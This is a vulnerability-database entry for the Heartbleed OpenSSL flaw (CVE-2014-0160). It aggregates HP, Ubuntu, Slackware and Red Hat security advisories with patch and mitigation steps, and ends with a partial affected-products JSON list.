Find a vulnerability
Search criteria
308 vulnerabilities by ca
VAR-201404-0592
Vulnerability from variot - Updated: 2026-04-10 23:34The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. OpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. This vulnerability is commonly referred to as "heartbleed.". RubyGems actionpack is prone to a denial-of-service vulnerability. Remote attackers can exploit this issue to cause denial-of-service conditions. OpenSSL is a 3rd party product that is embedded with some of HP Software products. This bulletin objective is to notify HP Software customers about products affected by the Heartbleed vulnerability. This weakness potentially allows disclosure of information protected, under normal conditions, by the SSL/TLS protocol. The impacted products appear in the list below are vulnerable due to embedding OpenSSL standard release software. Each bulletin will include a patch and/or mitigation guideline.
Note: OpenSSL is an external product embedded in HP products.
Bulletin Applicability:
This bulletin applies to each OpenSSL component that is embedded within the HP products listed in the security bulletin. The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide.
To learn more about HP Software Incident Response, please visit http://www8.h p.com/us/en/software-solutions/enterprise-software-security-center/response-c enter.html . No user action is required to install them. HP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version 1.0.1f for the following firmware versions:
671H_GS00601 665H_GS12501 663H_GS04601
HP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in 655H firmware versions:
655H_GS10201
HP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions. If the library firmware cannot be updated, HP recommends following the Mitigation Instructions below.
Mitigation Instructions
The following configuration options that allow access to the Heartbeat function in the vulnerable versions of OpenSSL are not enabled by default. Verify that the following options are "disabled" using the Tape Library GUI:
Product Configuration Options to Disable TLS Heartbeat Functions
Secure SMI-S CVTL User
Note: Disabling these features blocks the vulnerable OpenSSL function in both the ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape Drives. The basic functionality of the library is not affected by these configuration changes and SSL access to the user interface is not affected by this configuration change or setting. ============================================================================ Ubuntu Security Notice USN-2165-1 April 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 13.10
- Ubuntu 12.10
- Ubuntu 12.04 LTS
Summary:
OpenSSL could be made to expose sensitive information over the network, possibly including private keys.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
Neel Mehta discovered that OpenSSL incorrectly handled memory in the TLS heartbeat extension. (CVE-2014-0160)
Yuval Yarom and Naomi Benger discovered that OpenSSL incorrectly handled timing during swap operations in the Montgomery ladder implementation. An attacker could use this issue to perform side-channel attacks and possibly recover ECDSA nonces. (CVE-2014-0076)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 13.10: libssl1.0.0 1.0.1e-3ubuntu1.2
Ubuntu 12.10: libssl1.0.0 1.0.1c-3ubuntu2.7
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.12
After a standard system update you need to reboot your computer to make all the necessary changes. Since this issue may have resulted in compromised private keys, it is recommended to regenerate them.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1g-i486-1_slack14.1.txz: Upgraded. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley agl@chromium.org and Bodo Moeller bmoeller@acm.org for preparing the fix. Fix for the attack described in the paper "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack" by Yuval Yarom and Naomi Benger. Details can be obtained from: http://eprint.iacr.org/2014/140 For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 ( Security fix ) patches/packages/openssl-solibs-1.0.1g-i486-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1g-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1g-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1g-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1g-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1g-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1g-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1g-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1g-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1g-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1g-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1g-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1g-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: 5467a62ebfbe9a9bfff64dcc4cfcdf7d openssl-1.0.1g-i486-1_slack14.0.txz bdadd9920f2ce6fe4a0a7bd0d96f99df openssl-solibs-1.0.1g-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 11ede2992e2b5d15bd3ffc5807571350 openssl-1.0.1g-x86_64-1_slack14.0.txz 858ea6409aab45a67a880458ce48f923 openssl-solibs-1.0.1g-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8638083d9768ffcc4b7c597806ca634c openssl-1.0.1g-i486-1_slack14.1.txz 4d9dfe9db9e1f286ead72fc60971807b openssl-solibs-1.0.1g-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: d85f8f451f71dd606f3adb59e582322a openssl-1.0.1g-x86_64-1_slack14.1.txz 43ff4bbfe26f99e7a3b9145146d191a0 openssl-solibs-1.0.1g-x86_64-1_slack14.1.txz
Slackware -current packages: 265a66855320207d4a7567ac5ae9a747 a/openssl-solibs-1.0.1g-i486-1.txz bf07a4b17f1c78a4081e2cfb711b8748 n/openssl-1.0.1g-i486-1.txz
Slackware x86_64 -current packages: 27e5135d764bd87bdb784b288e416b22 a/openssl-solibs-1.0.1g-x86_64-1.txz 5ef747eed99ac34102b34d8d0eaed3a8 n/openssl-1.0.1g-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1g-i486-1_slack14.1.txz openssl-solibs-1.0.1g-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. If bulk software or firmware updates are required, use an unaffected or patched version of HP Smart Update Manager (HP SUM) to do single or batch updates. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: rhevm-spice-client security update Advisory ID: RHSA-2014:0416-01 Product: Red Hat Enterprise Virtualization Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0416.html Issue date: 2014-04-17 CVE Names: CVE-2012-4929 CVE-2013-0169 CVE-2013-4353 CVE-2014-0160 =====================================================================
- Summary:
Updated rhevm-spice-client packages that fix multiple security issues are now available for Red Hat Enterprise Virtualization Manager 3.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
RHEV-M 3.3 - noarch
- Description:
Red Hat Enterprise Virtualization Manager provides access to virtual machines using SPICE. These SPICE client packages provide the SPICE client and usbclerk service for both Windows 32-bit operating systems and Windows 64-bit operating systems.
The rhevm-spice-client package includes the mingw-virt-viewer Windows SPICE client. OpenSSL, a general purpose cryptography library with a TLS implementation, is bundled with mingw-virt-viewer. The mingw-virt-viewer package has been updated to correct the following issues:
An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. (CVE-2014-0160)
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169)
A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash. (CVE-2013-4353)
It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text. (CVE-2012-4929)
Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as the original reporter.
The updated mingw-virt-viewer Windows SPICE client further includes OpenSSL security fixes that have no security impact on mingw-virt-viewer itself. The security fixes included in this update address the following CVE numbers:
CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166
All Red Hat Enterprise Virtualization Manager users are advised to upgrade to these updated packages, which address these issues.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
857051 - CVE-2012-4929 SSL/TLS CRIME attack against HTTPS 907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13) 1049058 - CVE-2013-4353 openssl: client NULL dereference crash on malformed handshake packets 1084875 - CVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets
- Package List:
RHEV-M 3.3:
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHEV/SRPMS/rhevm-spice-client-3.3-12.el6_5.src.rpm
noarch: rhevm-spice-client-x64-cab-3.3-12.el6_5.noarch.rpm rhevm-spice-client-x64-msi-3.3-12.el6_5.noarch.rpm rhevm-spice-client-x86-cab-3.3-12.el6_5.noarch.rpm rhevm-spice-client-x86-msi-3.3-12.el6_5.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2012-4929.html https://www.redhat.com/security/data/cve/CVE-2013-0169.html https://www.redhat.com/security/data/cve/CVE-2013-4353.html https://www.redhat.com/security/data/cve/CVE-2014-0160.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
The HP SIM software itself is not vulnerable to CVE-2014-0160 ("Heartbleed"). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04239372
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04239372 Version: 4
HPSBMU02998 rev.4 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information, Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-04-13 Last Updated: 2014-05-13
Potential Security Impact: Remote disclosure of information, Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Denial of Service (DoS).
References:
CVE-2014-0160 (SSRT101501) Disclosure of Information - "Heartbleed" CVE-2013-4353 Denial of Service (DoS) CVE-2013-6449 Denial of Service (DoS) CVE-2013-6450 Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3, v7.3.1 for Linux and Windows.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-4353 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2013-6449 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2013-6450 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8 CVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve the vulnerabilities for the impacted versions of HP System Management Homepage (SMH):
Product version/Platform Download Location
SMH 7.2.3 Windows x86 http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52
SMH 7.2.3 Windows x64 http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37
SMH 7.3.2.1(B) Windows x86 http://www.hp.com/swpublishing/MTX-27e03b2f9cd24e77adc9dba94a
SMH 7.3.2.1(B) Windows x64 http://www.hp.com/swpublishing/MTX-37075daeead2433cb41b59ae76
SMH 7.3.2 Linux x86 http://www.hp.com/swpublishing/MTX-3d92ccccf85f404e8ba36a8178
SMH 7.3.2 Linux x64 http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37
Notes
SMH 7.2.3 recommended for customers running Windows 2003 OS Updated OpenSSL to version 1.0.1g
Note: If you believe your SMH installation was exploited while it was running components vulnerable to heartbleed, there are some steps to perform after youve upgraded to the non-vulnerable components. These steps include revoking, recreating, and re-importing certificates and resetting passwords that might have been harvested by a malicious attacker using the heartbleed vulnerability.
Impact on VCA - VCRM communication: VCA configures VCRM by importing the SMH certificate from the SMH of VCA into the SMH of VCRM. When this certificate is deleted & regenerated (as suggested before), it needs to be (re)imported if the user wants to continue with Trust by Certificate option, and the outdated certificate should be revoked (deleted) from each location where it was previously imported. If you use HPSIMs 2-way trust feature, and have imported SMH certificates into HPSIM, you will also need to revoke those SMH certificated from HPSIM and reimport the newly created SMH certificates. Though SMH uses OS credentials using OS-based APIs, user provided credentials are passed from the client (browser) to the server (SMH) using the HTTPS protocol. If you suspect your systems using SMH were exploited while they were vulnerable to heartbleed, these passwords need to be reset.
Frequently Asked Questions
Will updated systems require a reboot after applying the SMH patch? No, reboot of the system will not be required. Installing the new build is sufficient to get back to the normal state. Is a Firmware Update necessary in addition to the SMH patch? No, only the SMH update is sufficient to remove the heartbleed-vulnerable version of SMH. Will new certificates be issued along with the patch, or need to be handled separately? If you suspect the certificate has been compromised due to this vulnerability, we do recommend to delete and revoke the certificate, or SMH will reuse the existing certificate. New certificate will be created when SMH service starts (at the end of the fresh / upgrade installation). Instructions on deleting the certificate are in the notes above. Where can I get SMH documentation? All major documents are available at: http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library Select HP Insight Management under Product and Solutions & check HP System Management Homepage to get SMH related documents.
What are the recommended upgrade paths? See the table below: SMH DVD SPP Recommended SMH update for Linux Recommended SMH update for Windows 2003 and Widows 2003 R2 Recommended SMH update for other Windows OS versions
v7.1.2 v7.1.2 2012.10.0 v7.3.2 v7.2.3 v7.3.2
v7.2.0 v7.2.0 2013.02.0(B) v7.3.2 v7.2.3 v7.3.2
v7.2.1 v7.2u1
v7.3.2 v7.2.3 v7.3.2
v7.2.2 v7.2u2 2013.09.0(B) v7.3.2 v7.2.3 v7.3.2
v7.3.0 v7.3.0
v7.3.2 not supported v7.3.2
v7.3.1 v7.3.1 2014.02.0 v7.3.2 not supported v7.3.2
How can I verify whether my setup is patched successfully? SMH version can be verified by executing following command on: Windows: hp\hpsmh\bin\smhlogreader version Linux: /opt/hp/hpsmh/bin/smhlogreader version Will VCA-VCRM communication be impacted due to the SMH certificate being deleted? VCA configures VCRM by importing the SMH certificate (sslshare\cert.pem) from the SMH of VCA to the SMH of VCRM. When this certificate is deleted & regenerated (as suggested before), it needs to be (re)imported if user wants to continue with Trust by Certificate option, and remove the old, previously imported certificate. Should I reset password on all managed nodes, where SMH was/is running? Though SMH uses OS credentials using OS based APIs, user-provided credentials are passed from the client (browser) to the server (SMH) using the HTTPS protocol. Passwords need to be reset if you suspect the vulnerable version of SMH was exploited by malicious users/ hackers.
HISTORY Version:1 (rev.1) - 13 April 2014 Initial release Version:2 (rev.2) - 17 April 2014 SMH 7.2.3 and 7.3.2 released Version:3 (rev.3) - 30 April 2014 SMH 7.3.2.1(B) released Version:4 (rev.4) - 13 May 2014 Added additional remediation steps for post update installation
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlNyLMAACgkQ4B86/C0qfVm6RQCg4JuHEt+iZq+td37hPIp27qrd fm4AoKM1d7+F05Xo87Bicnmh0OHidg/O =bK11 -----END PGP SIGNATURE----- . This bulletin will give you the information needed to update your HP Insight Control server deployment solution.
Install HP Management Agents for Windows x86/x64 Install HP Management Agents for RHEL 5 x64 Install HP Management Agents for RHEL 6 x64 Install HP Management Agents for SLES 10 x64 Install HP Management Agents for SLES 11 x64
References: CVE-2014-0160 (SSRT101538)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP is actively working to address this vulnerability for the impacted versions of HP Insight Control server deployment. This bulletin may be revised. It is recommended that customers take the following approaches depending on the version of HP Insight Control server deployment:
To address the vulnerability in an initial installation of HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 only follow steps 1 through Step 3 of the following procedure, before initiating an operating system deployment.
To address the vulnerability in a previous installation of HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 follow all steps in the following procedure.
Delete the smhamd64-.exe/smhx86-.exe" from Component Copy Location listed in the following table, row 1,2,3,4. Delete the affected hpsmh-7.*.rpm" from Component Copy Location listed in the following table, row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location suggested in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
1 http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52 smhx86-cp023242.exe \express\hpfeatures\hpagents-ws\components\Win2003
2 http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37 smhamd64-cp023243.exe \express\hpfeatures\hpagents-ws\components\Win2003
3 http://www.hp.com/swpublishing/MTX-2e19c856f0e84e20a14c63ecd0 smhamd64-cp023240.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-41199f68c1144acb84a5798bf0 smhx86-cp023239.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components \express\hpfeatures\hpagents-sles10-x64\components \express\hpfeatures\hpagents-rhel5-x64\components \express\hpfeatures\hpagents-rhel6-x64\components
Table 1
Initiate Install HP Management Agents for SLES 11 x64 on targets running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on targets running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL 5 x64
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "mivoice",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "1.3.2.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "20"
},
{
"_id": null,
"model": "v60",
"scope": "eq",
"trust": 1.0,
"vendor": "intellian",
"version": "1.15"
},
{
"_id": null,
"model": "s9922l",
"scope": "eq",
"trust": 1.0,
"vendor": "ricon",
"version": "16.10.3\\(3794\\)"
},
{
"_id": null,
"model": "micollab",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "7.0"
},
{
"_id": null,
"model": "mivoice",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "1.1.2.5"
},
{
"_id": null,
"model": "gluster storage",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "application processing engine",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2.0"
},
{
"_id": null,
"model": "v100",
"scope": "eq",
"trust": 1.0,
"vendor": "intellian",
"version": "1.24"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.1g"
},
{
"_id": null,
"model": "simatic s7-1500",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.5"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "12.3"
},
{
"_id": null,
"model": "splunk",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "6.0.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "7.0"
},
{
"_id": null,
"model": "micollab",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.5"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "19"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.10"
},
{
"_id": null,
"model": "mivoice",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "1.1.3.3"
},
{
"_id": null,
"model": "symantec messaging gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.6.1"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.1"
},
{
"_id": null,
"model": "v100",
"scope": "eq",
"trust": 1.0,
"vendor": "intellian",
"version": "1.20"
},
{
"_id": null,
"model": "v60",
"scope": "eq",
"trust": 1.0,
"vendor": "intellian",
"version": "1.25"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "13.10"
},
{
"_id": null,
"model": "cp 1543-1",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.1"
},
{
"_id": null,
"model": "wincc open architecture",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "3.12"
},
{
"_id": null,
"model": "micollab",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "7.3.0.104"
},
{
"_id": null,
"model": "splunk",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "6.0.3"
},
{
"_id": null,
"model": "mivoice",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "1.2.0.11"
},
{
"_id": null,
"model": "elan-8.2",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "8.3.3"
},
{
"_id": null,
"model": "micollab",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "7.2"
},
{
"_id": null,
"model": "storage",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.5"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "server",
"scope": "lt",
"trust": 1.0,
"vendor": "filezilla",
"version": "0.9.44"
},
{
"_id": null,
"model": "micollab",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "7.1"
},
{
"_id": null,
"model": "simatic s7-1500t",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.5"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "mivoice",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "1.4.0.102"
},
{
"_id": null,
"model": "v100",
"scope": "eq",
"trust": 1.0,
"vendor": "intellian",
"version": "1.21"
},
{
"_id": null,
"model": "symantec messaging gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.6.0"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "13.1"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.5"
},
{
"_id": null,
"model": "micollab",
"scope": "eq",
"trust": 1.0,
"vendor": "mitel",
"version": "7.3"
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "amazon",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "arch linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "aruba",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "attachmate",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "bee ware",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "blue coat",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian gnu linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "extreme",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "gentoo linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "global associates",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "google",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hewlett packard",
"version": null
},
{
